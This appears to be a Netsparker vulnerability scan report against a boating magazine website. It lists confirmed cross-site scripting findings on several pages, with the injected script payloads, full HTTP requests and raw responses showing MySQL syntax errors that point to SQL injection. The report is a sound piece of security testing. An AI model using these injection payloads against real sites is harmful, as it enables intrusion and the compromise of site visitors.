document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>


</head>


<body>
<div id="all">
<div id="header">

<!-- Example Ad for demo purposes -->

<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services.html" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue.html" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=97&Itemid=108" alt="Boat Locker Marketplace" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span&g..
- /buy-a-boat

/buy-a-boat CONFIRMED

http://www.soundingsonline.com/buy-a-boat?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0025..

Parameters

Parameter Type Value
format GET feed
type GET rss
Query Based QUERYSTRING '"--></style></script><script>alert(0x00257B)</script>

Request

GET /buy-a-boat?'"--></style></script><script>netsparker(0x00257B)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:38:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:38:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00257B)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00257B)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/buy-a-boat" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Buying a Boat? Search on Soundingsonline.com</title> <link href="/buy-a-boat?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/buy-a-boat?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_buy_a_boat"><!--
Type of page: category<br />Section: 16, s_uncategorized<br />Category: 98, c_uncategorized<br />Menu: 111, m_buy_a_boat-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe<..
- /news/todays-top-stories/275642-deals-and-steals-highlight-big-nautical-flea-market

/news/todays-top-stories/275642-deals-and-steals-highlight-big-nautical-flea-market CONFIRMED

http://www.soundingsonline.com/news/todays-top-stories/275642-deals-and-steals-highlight-big-nautica..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0025D1)</script>

Request

GET /news/todays-top-stories/275642-deals-and-steals-highlight-big-nautical-flea-market?'"--></style></script><script>netsparker(0x0025D1)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/index.php?format=feed&type=rss
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=0q8502hbodf22uvijjncjudmq7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:41:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:41:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D1)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0025D1)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/todays-top-stories/275642-deals-and-steals-highlight-big-nautical-flea-market" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Deals and 'steals' highlight big nautical flea market" /> <meta name="author" content="Mike Trocchi" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Deals and 'steals' highlight big nautical flea market</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: article<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
